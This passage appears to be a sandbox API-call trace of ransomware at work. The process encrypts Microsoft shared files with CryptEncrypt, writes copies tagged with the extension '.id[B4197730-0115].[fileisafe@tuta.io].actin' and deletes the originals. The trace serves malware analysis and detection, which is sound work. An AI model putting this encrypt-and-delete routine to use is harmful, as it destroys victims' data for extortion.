shared\\ClickToRun\\ServiceWatcherSchedule.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0146.091] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac31f0) returned 1 [0146.091] CryptSetKeyParam (hKey=0xac31f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0146.091] ReadFile (in: hFile=0x304, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x1162, lpOverlapped=0x0) returned 1 [0146.095] CryptEncrypt (in: hKey=0xac31f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x1170, dwBufLen=0x1170 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x1170) returned 1 [0146.095] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x1170, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x1170, lpOverlapped=0x0) returned 1 [0146.096] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2eb0) returned 1 [0146.096] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0146.096] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60, dwBufLen=0x60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60) returned 1 [0146.096] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0146.096] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x112, lpOverlapped=0x0) returned 1 [0146.096] CryptDestroyKey (hKey=0xac31f0) returned 1 [0146.096] CloseHandle (hObject=0x304) returned 1 [0146.096] CloseHandle (hObject=0x2e4) returned 1 [0146.096] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml")) returned 1 [0146.097] SetEvent (hEvent=0x288) returned 1 [0146.097] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.097] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0146.098] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1053784) returned 1 [0146.098] CloseHandle (hObject=0x2e4) returned 1 [0146.098] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll")) returned 0x20 [0146.098] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.098] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.098] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.098] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0146.099] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=982720) returned 1 [0146.099] CloseHandle (hObject=0x2e4) returned 1 [0146.099] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll")) returned 0x20 [0146.099] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.099] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0146.099] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0146.099] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0146.099] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.100] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3370) returned 1 [0146.100] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0146.100] ReadFile (in: hFile=0x2e4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xefec0, lpOverlapped=0x0) returned 1 [0146.353] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xefed0, dwBufLen=0xefed0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xefed0) returned 1 [0146.354] WriteFile (in: hFile=0x304, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xefed0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xefed0, lpOverlapped=0x0) returned 1 [0146.370] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2ff0) returned 1 [0146.370] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0146.370] CryptEncrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0146.370] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0146.370] WriteFile (in: hFile=0x304, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0146.370] CryptDestroyKey (hKey=0xac3370) returned 1 [0146.370] CloseHandle (hObject=0x2e4) returned 1 [0146.370] CloseHandle (hObject=0x304) returned 1 [0146.382] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll")) returned 1 [0146.552] SetEvent (hEvent=0x288) returned 1 [0146.552] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.553] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=88752) returned 1 [0146.553] CloseHandle (hObject=0x2e0) returned 1 [0146.553] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll")) returned 0x20 [0146.553] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.553] SetEvent (hEvent=0x288) returned 1 [0146.553] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.554] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=791421) returned 1 [0146.554] CloseHandle (hObject=0x2e0) returned 1 [0146.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0146.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.554] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.555] SetEvent (hEvent=0x288) returned 1 [0146.555] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.555] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.555] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10752) returned 1 [0146.555] CloseHandle (hObject=0x2e0) returned 1 [0146.555] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui")) returned 0x20 [0146.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.556] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.556] SetEvent (hEvent=0x288) returned 1 [0146.556] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.556] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.556] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10752) returned 1 [0146.556] CloseHandle (hObject=0x2e0) returned 1 [0146.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui")) returned 0x20 [0146.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.556] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.556] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.557] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.557] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=27045) returned 1 [0146.557] CloseHandle (hObject=0x2e0) returned 1 [0146.557] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0146.557] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.557] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.558] SetEvent (hEvent=0x288) returned 1 [0146.558] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.558] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.558] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=9728) returned 1 [0146.558] CloseHandle (hObject=0x2e0) returned 1 [0146.558] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui")) returned 0x20 [0146.558] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.558] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.558] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.558] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.559] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0146.559] CloseHandle (hObject=0x2e0) returned 1 [0146.565] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui")) returned 0x20 [0146.566] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.566] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.566] SetEvent (hEvent=0x288) returned 1 [0146.566] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.566] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.566] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10752) returned 1 [0146.566] CloseHandle (hObject=0x2e0) returned 1 [0146.566] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui")) returned 0x20 [0146.566] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.566] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.567] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.567] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.567] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10752) returned 1 [0146.567] CloseHandle (hObject=0x2e0) returned 1 [0146.567] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui")) returned 0x20 [0146.567] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.567] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.567] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.567] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.568] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=9728) returned 1 [0146.568] CloseHandle (hObject=0x2e0) returned 1 [0146.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui")) returned 0x20 [0146.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.568] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.568] SetEvent (hEvent=0x288) returned 1 [0146.568] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.568] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.570] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=111320) returned 1 [0146.570] CloseHandle (hObject=0x2e0) returned 1 [0146.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0146.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.570] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft 